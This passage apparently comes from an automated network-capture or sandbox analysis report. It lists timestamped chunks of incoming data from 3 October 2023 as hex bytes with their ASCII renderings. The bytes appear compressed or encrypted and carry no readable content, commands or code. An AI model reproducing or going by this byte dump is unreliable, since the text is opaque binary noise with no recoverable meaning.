e0 b3 96 01 ff 55 35 f4 72 2a 3a a6 ff 6f 54 96 7b c3 58 0d 64 5c 10 7c 0b 19 f8 06 d9 39 13 94 4c 3d da 2b 7c 1f 2c d0 b6 aa d7 7e 97 45 25 ab 5c d6 46 79 7b 20 a0 c4 f3 0c ea 70 0b f8 96 4d c1 f9 f1 65 7b Data Ascii: {D( N3.\ .iG/3JT(eGjT1cB{Hm/g>^zx9'mp'!q!JraU^8KY<Zon<$skiwp\|mBrGwyh3$hU5r*:oT{Xd\\|9L=+\|,~E%\Fy{ pMe{
2023-10-03 20:34:59 UTC	1105	IN	Data Raw: 11 76 4a bb 64 36 9d 60 c7 75 f5 63 76 88 bd 8f 8a ee b7 c0 38 c8 4a 53 b9 7c 45 b6 4f 14 a5 b9 5c de f8 e7 60 98 5d e4 ee 9a 5d bf d1 d8 81 5d 31 c3 e0 62 d6 e4 e5 f1 ed 88 3d c3 23 e1 b2 30 3d c6 12 78 29 3e 64 24 73 ce 23 d7 4a 9b d7 2c 01 aa 42 fc 61 92 46 64 3b 78 c5 a4 86 67 3b e4 76 a2 bb 83 35 fc f1 d8 e8 c0 54 8f bc 73 bc 53 62 19 64 a7 fe c8 86 08 f7 70 dd 1b fb b7 d3 df 25 73 69 a6 53 86 0b f8 c5 10 27 1b 6d c0 1f 6e 47 b8 47 1c e7 1e ad 47 79 4f 6e 91 b8 75 cb af 98 43 ab c6 fe 31 f7 ac 8b 27 de 0f 2e 70 47 7b f7 5c 1e ff c0 31 5a 7a ff 53 90 3c f2 48 de fd 5d 99 d6 b8 3f 23 b9 31 eb 9e 73 26 60 90 75 b8 fb 28 97 df 2e d0 91 04 68 46 a1 d1 d7 af db 2b b7 d4 46 51 5f bd ca e5 9c bf 5d 2e 27 91 6e 44 f7 6d d3 9b c4 7f a6 9a 89 e6 d7 24 1e 30 6b Data Ascii: vJd6`ucv8JS\|EO\`]]]1b=#0=x)>d$s#J,BaFd;xg;v5TsSbdp%siS'mnGGGyOnuC1'.pG{\1ZzS<H]?#1s&`u(.hF+FQ_].'nDm$0k
2023-10-03 20:34:59 UTC	1121	IN	Data Raw: c7 4b 26 0e c3 1b 5f 81 34 b3 02 a7 22 83 a0 2d f4 bf 2e 9a 68 be 6b cd 3c 5c 5b 0f b6 16 1e 69 fb 65 d1 7a d1 c7 3b 3c 33 a6 30 78 2c 84 91 be ff 18 dc f2 c7 84 83 d2 c1 29 1d ec 88 76 10 29 2e 96 df 6b 37 95 0b 1f 24 24 51 b0 fc 00 b4 84 8f e0 93 0d 69 04 af 02 4f ca 6d 29 60 58 06 79 02 6b d6 90 1f 45 f6 ff 92 00 10 14 f9 b6 75 06 ae 29 80 4c 00 90 c2 08 29 a7 6d fe dc 90 3e 9a 9e 8e d6 26 73 ba f7 16 4e e4 c0 3b 49 5a 0d f1 1b 52 64 86 49 b8 33 22 ef 5a 7c 90 73 b3 ee d7 a1 ad d8 eb 5e 15 49 59 93 69 bf 25 b8 9c 1c 58 0b 58 0b 57 46 b9 65 6c 8e 50 5e d2 29 6f 91 c5 e1 2e 5f 15 51 33 85 b3 af 21 8a d5 8b 32 b4 e4 d1 11 b5 9c 4d e9 3e d2 54 2d 17 04 eb be 5b 74 37 17 de ec ad 44 d7 f1 0a dd 22 f3 99 df 92 eb 66 0e 7d f8 53 62 4a 16 ce 3d 6a e3 73 89 af Data Ascii: K&_4"-.hk<\[iez;<30x,)v).k7$$QiOm)`XykEu)L)m>&sN;IZRdI3"Z\|s^IYi%XXWFelP^)o._Q3!2M>T-[t7D"f}SbJ=js
2023-10-03 20:34:59 UTC	1137	IN	Data Raw: 60 3d a2 54 bf 97 f0 ac 83 c7 19 a8 b8 ff 01 66 77 34 50 29 c3 17 dd 9d ed 42 21 69 bf 62 1f 42 48 7f 03 d7 0d 4c 33 10 db 2e 70 ba 9d 7a d5 90 25 fb f6 67 93 c4 4e f5 38 1b 68 95 fc a1 44 1d c8 5e 96 4e 28 ba cb a0 12 ef e3 7a f2 5d f1 ce 28 99 08 fa fc 2a ea 56 f1 3b b7 b9 6f d6 55 32 ec d2 0e 63 c7 2b 92 61 6c ba a8 53 30 be 62 d9 35 c2 83 bb a4 e2 fb 2c d3 58 8f f1 3a 7f 6a 6a 7f c0 bb b3 07 7d bc 0a 22 83 0b e5 87 1e 0e 11 d5 44 47 77 c9 73 ec 17 4a 08 88 e3 9f 84 e9 3a a4 02 28 7a 17 83 8b d0 5b e1 52 01 0d c6 4a 90 91 ee 6f 77 90 81 8c a5 20 06 93 90 c9 31 bc 20 09 4c cd 32 5e ad 25 93 bc 73 f2 f5 94 2c c6 ee 91 9d 6d a7 b3 46 3f 42 c4 9f 32 1f eb eb d4 12 c2 eb 54 f8 3e 21 cd 41 77 a5 7f 0f 38 9b bc 76 1d 2d 45 54 74 6c 05 42 b8 6f fa 71 6f ff 50 Data Ascii: `=Tfw4P)B!ibBHL3.pz%gN8hD^N(z](*V;oU2c+alS0b5,X:jj}"DGwsJ:(z[RJow 1 L2^%s,mF?B2T>!Aw8v-ETtlBoqoP
2023-10-03 20:34:59 UTC	1153	IN	Data Raw: 64 eb 10 78 d1 49 ad 92 b9 60 6f 12 66 b7 89 8d c4 7b 9e f3 3e bc d9 5d f6 b2 e7 ec 79 cf 7b f3 62 77 d8 c1 9e 66 30 80 c3 9a de 71 96 c6 fc 58 4c ba d5 f4 34 d8 40 8d 64 14 c7 91 3d e4 b0 06 eb 87 d0 4f 63 90 44 31 69 27 29 cc 06 33 47 d2 39 f7 74 f6 23 ee fc c7 fb 1f b9 b6 7a 2c cc f1 df c6 15 ed fb 61 ff 9b 11 8f 0a 6a b9 85 21 a2 c9 f8 16 d3 94 6e a4 dd e4 99 6e 93 33 c1 b1 ce e4 97 ca c4 00 1f 89 fb 50 0b 48 67 fb 83 07 10 5b 72 3d 81 ed 4c 39 94 a2 f2 8f 06 31 06 4a 10 d7 e0 54 b4 1a 4b 6d c1 15 45 aa 7b 93 74 6e e1 c2 04 1a 32 de 72 89 d9 6d c0 e4 41 0b dc c9 57 c3 b6 a4 af 10 ad ec 70 0e 72 9d 6c f2 13 5c 85 31 51 ee 00 22 aa 9a 26 7b 92 c9 c9 e5 b2 ec 40 8b 84 b9 12 40 d9 5a 53 02 6e 7f 96 78 58 36 ef e5 42 cb 37 a4 64 7e 83 c6 7d 85 07 aa c0 01 Data Ascii: dxI`of{>]y{bwf0qXL4@d=OcD1i')3G9t#z,aj!nn3PHg[r=L91JTKmE{tn2rmAWprl\1Q"&{@@ZSnxX6B7d~}
2023-10-03 20:34:59 UTC	1169	IN	Data Raw: 7e f9 de df 58 0d 00 b4 94 5e ba 9e 6b 5f 0d 77 8a 0e 65 08 92 ec ef 54 4a 85 19 ca 5b ce 18 ef d8 54 ce bd cc 1c d3 c1 78 76 65 e9 7a ba 59 e2 d7 ca b1 a7 13 7d da ab f9 e1 92 d1 35 43 d3 fd 74 31 00 44 e5 3b da 24 e3 af 9d cb 69 5e 56 ae 03 ff 11 03 cf 97 be db 7a 1a 8c cd 63 f9 97 fd cb ba 44 d9 9b de 54 4f 71 c7 56 f7 e8 ba ab 2e af 90 9f 15 6a 34 6c e7 bf 39 34 83 bf 33 fa 23 06 65 78 cf 7f c1 79 be a3 71 5f a8 d6 b2 95 ec d8 53 b8 ce 69 3c 67 e6 9e be d9 2b 4f 77 22 21 2b 65 96 ca f3 75 0e e8 9f 9a de 4b 93 29 d5 ab af 94 7b 67 b2 e6 95 a4 19 81 fe a2 42 2d 7a 43 07 2a e7 12 c9 b8 34 cb 39 79 f2 eb bc a1 35 7a e7 8f 06 68 a6 c0 72 70 6a cc 95 bd a6 9f 8d 0f e7 95 96 70 a9 83 05 cf 8c ce 36 ed 73 8d 16 d4 48 4d 7d 5a 0e 5b b2 ca 32 dc 32 d1 ca dd 33 Data Ascii: ~X^k_weTJ[TxvezY}5Ct1D;$i^VzcDTOqV.j4l943#exyq_Si<g+Ow"!+euK){gB-zC*49y5zhrpjp6sHM}Z[223
2023-10-03 20:34:59 UTC	1185	IN	Data Raw: 34 40 18 6c 71 72 c1 91 22 3b 2b ab d7 14 95 33 33 83 85 12 ca 09 2d 00 d5 41 0d 38 b7 80 1f 3d 67 8c 32 b6 e0 b0 00 45 b2 a0 1a 28 aa 84 71 8e 00 e1 20 60 01 51 6f 92 25 8d 92 b0 64 4c a2 05 0d 05 89 40 3b 53 8e 48 44 1a 05 b8 ea cc a5 2c 3e 96 53 4d 3a 82 c1 a2 20 8c 65 32 fd 38 b4 4b 80 28 1c c6 92 01 f0 75 63 58 12 51 da 6c ac 56 00 80 35 1a 0b 8e a8 49 57 b2 44 50 d0 0f a5 66 2c 96 29 94 32 19 ab 92 28 3a c6 b2 28 2a c5 07 29 62 a5 fa 5e 6f ce f7 f8 cf bb ab b6 2c bf 9b 7c 99 43 52 97 81 1e 3b f3 a6 f0 73 66 28 02 b6 2e 76 b1 3c a8 43 5d b4 08 2e 5b 55 3b a7 3b 78 bc dd a5 25 a4 7e da 3b dd cf c2 cb e1 ae 73 19 aa f5 c7 6a 09 07 b2 9a 93 12 8d 04 04 f4 4b 6e d3 d2 ff 26 7c b9 e0 51 80 03 03 5f 51 df 03 71 48 bd 17 21 6e 07 e8 0c d4 14 25 bb e1 b5 71 Data Ascii: 4@lqr";+33-A8=g2E(q `Qo%dL@;SHD,>SM: e28K(ucXQlV5IWDPf,)2(:(*)b^o,\|CR;sf(.v<C].[U;;x%~;sjKn&\|Q_QqH!n%q
2023-10-03 20:34:59 UTC	1201	IN	Data Raw: 16 a1 02 a2 5a 41 4a ee 59 d5 25 48 41 d0 56 c4 f8 90 01 be 90 85 dd 5a 67 47 28 13 c2 9c 1c 20 80 a3 55 31 e4 17 5b c2 cc b6 a6 2a c5 d2 68 87 1b 1c e2 14 24 6c bd 71 1d 09 21 67 91 03 2f 5d 55 f2 c3 33 a8 69 85 53 06 5a 0a a1 b5 c1 af 56 4a 4e e9 88 89 56 28 b1 d0 0a 1a b5 62 b5 a2 d1 27 ad c0 53 30 40 d9 bb 7c 8d c7 b8 4d e4 80 0b c1 a3 17 41 91 16 74 c0 b1 56 24 34 d9 62 d6 8b 75 a5 5a e1 76 4c a4 e8 e0 0a 03 b4 4e b6 83 75 86 4c dc a0 9e 61 85 4b ea 82 0d a6 b1 42 a3 ad 90 b4 68 58 60 58 8a e1 16 f3 fd 05 09 13 4f 6d 40 10 6d e2 83 be 53 35 f2 05 3b 52 ad b0 ce 39 ce d3 e4 58 56 aa b5 ce 3b 1f 15 91 87 2c 96 b4 0c a2 94 f5 8e 56 79 95 bb 40 a4 3b 50 9d 16 05 65 ba 57 c8 48 1a 96 0e b6 d0 ef 6b a6 b7 54 2a e8 b9 1c ec 49 eb 5f 11 5a 0e a8 d2 c6 9a 98 Data Ascii: ZAJY%HAVZgG( U1[h$lq!g/]U3iSZVJNV(b'S0@\|MAtV$4buZvLNuLaKBhX`XOm@mS5;R9XV;,Vy@;PeWHkTI_Z
2023-10-03 20:34:59 UTC	1217	IN	Data Raw: c7 72 a0 c6 00 e4 e8 3c 35 a9 fd 4d 9a e7 61 5c fe b1 9b eb d5 b9 66 32 7f c8 5e e3 3d 19 17 c5 22 3d 59 a4 b1 18 26 27 aa 68 5c f3 22 3c 8e 13 57 b5 9f 1c 27 13 56 e6 9f f6 c5 bc 8a 09 69 15 cb f7 a4 94 c6 86 9e 4b 98 c3 de 0c 0d 97 a4 c8 df 98 0c 22 81 3c 4f 48 68 a0 0c 71 9c 17 59 3a 94 b4 e2 31 9d 4b 5e 52 f1 9c 4e 30 5c d7 64 2f f6 60 db fc 06 18 26 27 af 57 3c 1c 13 93 55 1a cf 71 12 61 c5 c5 30 5f 54 3c 78 94 c6 e2 98 9d ac a0 71 11 27 22 9b dc 60 9a af 1d 1d b5 1c 74 f5 5a 94 e0 77 9d af 79 95 69 56 50 50 17 e5 07 ef d9 98 f8 13 bc c6 8c 9f c9 6d e3 fd 4f 6c 8d f9 3f f1 6a d4 90 ef 16 e7 4a 93 06 68 ff bc 3c 52 62 4e 71 e3 e7 7a 8c b3 19 c7 1c cc 2f 5e ea 1c b1 e2 8b c2 1b d6 06 29 37 e7 8e 95 9c 03 4f de 73 b6 c8 8b f3 c5 de 9c 38 3e 6f 11 ea 81 Data Ascii: r<5Ma\f2^="=Y&'h\"<W'ViK"<OHhqY:1K^RN0\d/`&'W<Uqa0_T<xq'"`tZwyiVPPmOl?jJh<RbNqz/^)7Os8>o
2023-10-03 20:34:59 UTC	1233	IN	Data Raw: 5f 86 d0 e2 8f 43 89 ac 10 e2 27 c7 0d 1b 5e 2a a5 d9 84 4a 5d e8 c2 7a ba 53 cb d8 07 1c 64 72 2c 55 26 33 6a e5 2b 63 b1 15 a9 eb 2c 04 37 74 b3 63 6f 45 8a 88 f3 88 97 1a 35 82 71 78 31 f8 b0 08 85 b4 f6 00 13 ee 03 20 13 58 86 9e cc 15 0d 01 0a f2 12 62 d4 4a f9 34 30 e2 3f 6c 41 54 71 56 46 35 3a b9 15 d7 96 a3 28 1a f9 5b 33 a7 a7 f3 32 9c d8 af 01 c3 88 11 45 df a7 9b a6 5c 41 98 80 c0 5c 28 b6 96 2f 3f ce 9c 5c 25 e2 b0 f9 b9 75 4b a1 d1 56 bd 41 31 b6 a8 65 83 35 10 91 f7 9c 01 8d 72 fb 87 61 ca a5 46 e1 fa 50 c2 ef 66 ae 49 17 4a 60 3f b2 0b 16 67 32 11 bd e0 f8 11 78 aa 54 90 fd 89 48 98 2f 03 98 76 4f 6c 08 97 f3 a8 46 f2 34 24 3e fa 0d 58 54 0d 72 a8 6a 1b 11 9e 42 3a 5b 48 99 a8 98 e4 90 60 24 30 c8 ac 41 58 64 21 cd 52 54 39 f3 ab 55 8b f2 Data Ascii: _C'^*J]zSdr,U&3j+c,7tcoE5qx1 XbJ40?lATqVF5:([32E\A\(/?\%uKVA1e5raFPfIJ`?g2xTH/vOlF4$>XTrjB:[H`$0AXd!RT9U
2023-10-03 20:34:59 UTC	1249	IN	Data Raw: c4 d9 2d 3b 7a f0 ea f4 83 93 2c 27 c9 92 0f 63 4e 81 81 c5 e9 d1 1e 40 b2 ee b4 ee a4 ae 36 e4 ee a9 7c 43 a5 f8 19 4e 30 cb 5f 0d 3b c8 95 02 74 33 a1 2c d5 87 53 f8 9f a5 47 1b 28 50 43 2f e0 5f 47 0b 22 bc d1 f0 02 e3 81 9f 84 a5 75 2e 07 a7 08 da b0 2d 8d 94 08 e0 18 e8 2d 2c 04 b2 4f 10 47 c8 b4 f3 08 dd 1e 58 7a 82 bc a3 b2 b2 74 3a 0d ed fc 76 c1 e8 0e 61 ba 6b 82 c1 ae ab ef d3 92 59 80 af 7e 48 09 9e e3 ec 96 81 5a 94 23 70 08 4e 48 32 20 bb e6 ec b6 62 68 8b ec b2 0f f4 dd b9 73 a8 0d e0 b5 69 5a 1f b5 f8 f6 c8 75 b9 ce b5 b8 e6 01 0a 6a c4 bf 57 d8 b1 fd 62 d9 e1 7a f2 83 36 61 0c fe 13 df bf 89 3d b0 48 b4 e5 1d 1a 3b a0 ba 22 7a 77 a7 b6 5b 8a ff 75 4a ca 95 01 6b 6d 93 f5 d1 75 d8 7b 05 a7 a8 75 b6 c2 12 f8 75 b0 ed 34 1c 66 8c 41 f2 29 9b Data Ascii: -;z,'cN@6\|CN0_;t3,SG(PC/_G"u.--,OGXzt:vakY~HZ#pNH2 bhsiZujWbz6a=H;"zw[uJkmu{uu4fA)
2023-10-03 20:34:59 UTC	1265	IN	Data Raw: 75 12 9a 8a 4d 86 7c d7 17 a7 b7 56 77 25 5d 9e bc 5f b0 0f 5a 42 f8 33 df 78 33 fe de fe 64 ef 9b 77 05 ec b3 71 1a 31 62 dd f2 6e f9 ae f3 23 83 f0 01 81 ec d6 4f fa a5 9e ea fb 06 e6 85 a7 4a e3 4c 6d 70 c4 b7 e3 ce fb 31 73 1e 3f d6 57 38 d0 4f 4f 2d b6 87 cf 82 35 f6 4e 3e 09 1e cb 62 29 ce d3 61 17 f5 01 b1 07 e7 a1 fc f8 b4 65 0f a7 a8 79 9c ff eb 44 d8 ee c1 1a c6 b5 c7 d6 3b f3 ae 2e f2 d6 eb 7c e6 03 2c 44 96 06 56 ff 17 bd 16 de 96 b1 2f 1d 73 dd 4a 3c 67 f5 b1 c9 10 d9 c4 cc 1b 41 e3 08 3f 23 a9 46 8f 28 cf c4 2f 86 02 fa f1 d9 6d bc 40 ee 66 c6 38 e4 2f 10 ab 4a a2 47 64 bb e3 dc 26 83 d3 81 97 fb 8a c7 d2 a9 7d ba c7 67 ee 54 8f 75 f7 7b 35 7f d0 81 69 72 aa a6 63 26 a2 3e 3a 5f 7b 06 47 4e 48 65 01 75 f7 f1 d3 79 e7 89 31 11 e2 9c 7f 62 e9 Data Ascii: uM\|Vw%]_ZB3x3dwq1bn#OJLmp1s?W8OO-5N>b)aeyD;.\|,DV/sJ<gA?#F(/m@f8/JGd&}gTu{5irc&>:_{GNHeuy1b
2023-10-03 20:34:59 UTC	1281	IN	Data Raw: 0a 1c 6c b8 3d 91 73 86 76 1c 8c 28 64 14 81 66 a4 7b f4 49 ba 34 3e 94 78 d9 7c 05 a8 d3 3c 3b 8e d8 08 9e 61 0f 41 0b 2e 79 1f 8a c7 c5 c7 9f c7 5f 1a d3 7c 53 1b 53 58 b4 48 31 23 ec f7 a2 7a 8c 1a cc 8e e2 5f 8b 65 4b 23 1d 6c 5e 27 9a 3e da 60 84 61 dc d8 47 58 4e de 72 6e e4 ef 09 c3 0b 8c 94 9c 54 3e 98 60 ad 0b a1 38 65 ab af 3d a1 65 8c 4d b6 6a 75 21 ba 44 a8 38 39 66 37 6f bb 93 d3 d3 f5 f4 b1 44 76 19 67 d6 28 55 e2 5c 18 cb e8 5b 00 98 42 eb 45 d5 3d d8 c7 02 a0 05 41 c7 a2 69 10 d6 ca d1 52 42 c3 c6 a6 a2 da 24 e7 cb a6 a1 b9 92 0d d9 4a 0c 7d 12 9e 4f 2b 81 9f d4 16 e3 65 b7 ab 0d b4 71 fd 06 ce 34 28 e1 eb 04 0b 82 cf cf e1 a8 3c 91 01 ee 25 99 d8 cd c2 43 2d 2c 20 22 a4 6f 9b 8b 56 84 16 68 9a 47 4b b9 b1 d0 f8 cd 54 94 64 54 87 f7 22 35 Data Ascii: l=sv(df{I4>x\|<;aA.y_\|SSXH1#z_eK#l^'>`aGXNrnT>`8e=eMju!D89f7oDvg(U\[BE=AiRB$J}O+eq4(<%C-, "oVhGKTdT"5
2023-10-03 20:34:59 UTC	1297	IN	Data Raw: 21 7c 42 2d 04 71 0b 4a 94 3a cf ec 3f ea 52 ad 64 de 68 40 f5 6f cd dd d2 0f 06 11 c1 86 7e 45 fa 8a 18 a4 4b 84 c4 43 f8 3d b9 d4 c8 79 72 45 c3 98 9b a1 68 21 24 8d 61 86 9a 68 1e 09 1a 73 e1 2b d1 01 95 c4 07 0c 4e 33 68 23 83 58 94 58 6e ed 6f ac 03 cc 94 25 9f 3c 20 d7 99 87 33 0e 9a 62 1e bf 38 f7 bb 9e b4 41 26 4a 71 3b 4b 3b 2a 3b 27 19 89 06 60 6a 4f 84 a9 f2 b0 03 70 0a 51 13 42 b2 cc 41 28 b5 11 a0 9e 94 91 77 21 1b 57 89 31 c1 63 e3 e3 d1 ab 91 2d 0b 68 82 e4 cb a9 c1 56 0d c2 0e 31 08 a3 b1 44 db 60 b6 99 7b d5 1b 79 5c ac 58 84 28 f9 d9 1c f4 89 ac d5 23 6e 8c e9 79 0a d0 e0 bb 11 a9 86 39 94 de 50 7d a2 2e 55 ae 28 3b 03 26 2b d2 12 c5 c9 43 e3 a0 e8 34 22 ec 30 ef cb 26 37 be 1a 00 fc a5 93 40 23 bc 92 4a f6 64 af 65 e2 cf 54 38 f8 ed 7b Data Ascii: !\|B-qJ:?Rdh@o~EKC=yrEh!$ahs+N3h#XXno%< 3b8A&Jq;K;*;'`jOpQBA(w!W1c-hV1D`{y\X(#ny9P}.U(;&+C4"0&7@#JdeT8{
2023-10-03 20:34:59 UTC	1313	IN	Data Raw: 24 1e 08 a2 a6 e6 7f 20 ba b8 bc 74 3d 01 38 8b 7e b9 c3 18 12 e3 b6 bb fc 05 8a d5 de d9 dc de c3 41 e3 e7 e8 05 9a 5a 4d 4b 69 fa 66 a2 f6 f4 b5 2c 7d 4d e3 6b 71 be fe 7b b5 0d b1 6d 75 75 5a 66 11 26 35 e9 4f 63 13 f2 fc e3 7c 1e 92 64 fb 2c 5c 5b aa 4a 4e d0 d9 bc 3d 02 96 42 f0 1e 9f 34 54 6f 9c d5 af b1 f2 be 37 3f b0 94 e3 12 b6 e6 82 3c 4b 36 83 86 43 ce 68 9e 70 e0 57 e1 e2 c9 2e 7c d1 50 2a 27 f4 c7 47 99 8d a4 d3 fc 7a e9 40 2f 6d 9a 7c b4 9c 4b 82 0b e7 45 01 bb f7 64 50 bf 66 8e 08 71 6e 2a 9a 7d a9 7e 24 f1 8e e9 eb 62 48 fa e0 94 14 ac 5b c1 bf a5 b7 e0 9b c8 f7 0b fe b2 0e 39 b8 e4 46 de b2 3b 93 18 60 15 51 f3 07 e7 62 f4 38 fc 50 12 1d 97 e6 b6 77 d1 fb 43 e5 0e 21 2a 40 d4 cc a6 7f cf db 38 95 89 df 57 1d 29 3b 91 14 f7 ea ac 22 b3 45 Data Ascii: $ t=8~AZMKif,}Mkq{muuZf&5Oc\|d,\[JN=B4To7?<K6ChpW.\|P'Gz@/m\|KEdPfqn}~$bH[9F;`Qb8PwC!*@8W);"E
2023-10-03 20:34:59 UTC	1329	IN	Data Raw: 95 cd 41 1e 5a ee b9 18 82 26 de 28 23 51 a2 56 7e cf 2d f3 e0 a6 e1 b8 8a ff 51 7e 3d 1e 0c 1d b6 13 e7 f4 65 c3 5a f4 6f 48 04 51 44 56 52 dd 14 50 b0 6f f0 45 70 8b 81 e1 fb 4e e8 56 8f 76 28 b3 40 5f 24 0b df 05 5b 85 cd 59 87 1e 7c 50 c2 fb 45 5e de d2 1d 26 9f 1b 4e 8e 75 d3 cf 48 7f 88 8a d1 f9 5c 6c 4b 62 db 54 12 85 97 a4 7f 68 8a 19 6e 69 a2 5b bd 5e be 23 ac 4c ad e5 00 3b 8f 03 a2 04 a1 ed 0b 49 0f 44 7f 59 12 ff a9 41 b2 2b 1f aa b2 97 24 59 68 14 b8 5e 1f eb 69 f1 c9 23 0f 93 a2 39 d5 51 c1 60 81 77 28 6f a7 15 5a c0 c0 7b 5f 72 47 c4 3e e4 7e a0 bb b3 a2 c7 48 be 89 bf 43 b3 36 2c 25 84 a2 9c b5 e7 80 05 c2 be 18 54 2c 8a 3d f1 66 5c 96 8a 25 63 3e f8 32 a9 d4 0c 14 9e 10 0c 8d 97 da a3 1e 32 e6 03 ee 42 a7 23 15 c6 c2 5c 1b 8f 7e bd a9 74 Data Ascii: AZ&(#QV~-Q~=eZoHQDVRPoEpNVv(@_$[Y\|PE^&NuH\lKbThni[^#L;IDYA+$Yh^i#9Q`w(oZ{_rG>~HC6,%T,=f\%c>22B#\~t
2023-10-03 20:34:59 UTC	1345	IN	Data Raw: dd 15 5c 59 74 1e b3 d9 ea d0 e4 a6 44 5f c0 21 46 16 a6 cf 0c b3 4d 8d 00 59 f2 f9 99 27 83 14 d9 56 2e f8 2a d8 ab e5 5d 8a e5 26 65 6e c6 5d dd 52 36 d6 90 49 f3 e7 bc 42 ab 69 32 3b 06 31 4b 51 4f 48 26 14 1a 86 50 f5 3e a1 61 8c 19 0d e7 8b 77 de a4 21 4d 19 dc 90 30 d4 70 0b 4e d0 16 77 1c db 0e fc f7 4a ae 75 10 45 13 6b d9 bc 84 8d d0 1e e0 4a 4d ef 33 9b 9f 23 35 a8 dd 23 7e 3c e5 20 d6 38 d0 13 a6 69 e7 02 c7 5b c3 f1 2a b4 75 27 b2 b2 56 84 08 0b cc 3f 93 24 7c af 4b b6 c7 01 04 0e 50 3c 8f 8d b9 37 94 be 96 e9 bb 0c 24 ff 82 87 5c b6 76 21 ec 06 ab 17 15 9e d4 13 a5 c1 d9 6d 30 07 ce 60 ba 9c 6d 44 f7 07 22 bf 62 a5 61 7e 79 ab ec d0 79 bb 17 22 b6 0d cd 03 8c 9d 07 da 4a 67 f1 9d f4 9e 4b 5c 83 a5 2a 43 e1 77 70 d4 78 93 9d af 0e 55 0e 35 9e Data Ascii: \YtD_!FMY'V.]&en]R6IBi2;1KQOH&P>aw!M0pNwJuEkJM3#5#~< 8i[u'V?$\|KP<7$\v!m0`mD"ba~yy"JgK\*CwpxU5
2023-10-03 20:34:59 UTC	1361	IN	Data Raw: d0 9c 6b 83 0d f3 cc d8 bc 5c 6c 6e d0 cc ab 3c 5b ae bb 3b 66 3a cb 2d e6 55 9e 2e d7 94 af cb 75 e4 2b 79 dd 79 25 5c 57 be a2 d7 45 57 90 ba c7 d5 e4 ce f1 6a bc 31 be 24 d7 22 af 90 eb c5 57 f1 ba f8 4a 5c 97 be 7a d7 21 af 1c 75 87 ab c6 9d e1 8a 71 57 f8 11 5e 2d 5e 14 d7 83 af c4 75 e0 ab 71 9d f8 0a 5c 17 be 3a d7 01 af 0c eb 0a 57 84 75 83 d5 df 9d e0 2a 70 e7 f7 02 5c fb bb f9 ad fa 5e 7d eb be 57 df 3a de 15 6f dd f7 4a 5b b7 bb ca ad c3 5d dd d6 d9 ae ea eb e8 57 73 75 72 ab b8 3a b8 d5 db 9d db aa 6d 8e ed b5 b6 a7 76 4a 5b 43 bb 9d ad 99 5d ca d6 c8 ae 63 eb 62 57 b0 75 b0 ab d7 3a d7 d5 6b 9d eb aa b5 8e 75 b5 5a a7 ba ca ad c3 5d 5d d6 59 ae aa eb a8 57 53 75 52 ab a8 3a a8 d5 d3 9d d3 aa 69 8e e9 b5 b4 a7 74 4a 5a 43 ba 1d ad 19 5d 8a d6 Data Ascii: k\ln<[;f:-U.u+yy%\WEWj1$"WJ\z!uqW^-^uq\:Wu*p\^}W:oJ[]Wsur:mvJ[C]cbWu:kuZ]]YWSuR:itJZC]
2023-10-03 20:34:59 UTC	1377	IN	Data Raw: 75 f7 c5 ec 1f cd 40 38 dd 49 1e 98 73 94 b7 3a c0 6c be 34 b8 4d ca 19 34 1a 1c 5b 70 6a ef 4f 1f 08 22 11 35 a7 27 81 08 8e af 6b 18 ca c6 7d 50 0b 84 76 dc 5e 24 f1 8d c4 1e e0 6b 4f f9 a6 6f ac 05 93 0f b9 12 bf 1c 91 ec 33 3f 9f 96 bd 1a f5 57 c8 9c 90 38 23 7d e7 08 56 b7 d3 11 17 66 77 50 8b 5d 78 e1 53 ef 47 a8 02 cb 42 c9 7e 45 18 ce 2a cf c1 8d 5c b4 f2 0a eb b0 d3 16 58 5f 30 3e 33 7d e0 e6 ab 59 de c9 60 42 a7 6d 7a 2c 08 8a 0e a9 84 43 6d 0a 36 e0 01 cc 03 21 25 8d 98 66 02 38 4f 1c c6 22 fe 91 9d 16 b0 2e 1a 1b 01 2c d6 f6 a5 34 be 81 9d 34 98 80 2a d3 14 f2 c5 13 ea 30 0b 51 29 e8 7b 30 d1 33 68 8c a4 0b 42 aa 09 10 43 96 c0 54 d6 60 c5 9f f4 60 74 a9 4b 0c 06 f1 85 0c a6 20 7f 13 57 68 5d 59 35 38 d0 5a 66 ab a0 89 ea 60 2f cd 1a f4 3f 8d Data Ascii: u@8Is:l4M4[pjO"5'k}Pv^$kOo3?W8#}VfwP]xSGB~E\X_0>3}Y`Bmz,Cm6!%f8O".,440Q){03hBCT``tK Wh]Y58Zf`/?
2023-10-03 20:34:59 UTC	1393	IN	Data Raw: 4a bb 1f 53 b0 b4 3b d7 9d 49 8b 40 09 ae 58 33 42 48 bc 7d 5a 96 0c 38 f8 88 16 e7 1e b5 0e da a3 53 17 7f 27 f3 48 f9 cf 7e 01 09 d6 d3 6c b9 6a 87 c8 70 79 9c 69 1a a1 4e 99 ef fe 68 0f 7d b5 52 be e8 c7 6f 9f dc a6 3f dd cb fd 30 22 0b ad 19 a9 84 a6 92 68 ef ba 92 8b 4f 91 a2 09 85 ca 8a 4e 09 3e d3 36 d1 e9 e9 fc 99 f7 66 a9 53 0b 01 05 3b 34 e6 cb 83 33 41 1d 7c e1 d8 76 61 31 11 8b 65 e8 b7 b6 97 59 b7 bd c2 cf e9 f9 a4 e9 ce 05 03 c5 82 9e 9d c5 f0 0b 03 c2 54 76 3f 4d ea e5 6b 91 97 6a 0c fb b0 ce 30 41 5c c0 be fb ae 87 53 6b 12 de 1b ff 94 cb 97 69 f3 9e 2c 02 f5 40 50 01 eb a7 c3 44 6c 77 67 2c cf 8e 12 38 64 bf 2d 3e d4 62 bb 79 e7 80 10 04 c7 b7 8b 57 6d 35 ff c7 48 f8 e4 0c 75 5e f8 06 67 e2 03 ce 50 c5 89 4a 3d d4 be 15 63 30 13 59 57 c2 Data Ascii: JS;I@X3BH}Z8S'H~ljpyiNh}Ro?0"hON>6fS;43A\|va1eYTv?Mkj0A\Ski,@PDlwg,8d->byWm5Hu^gPJ=c0YW
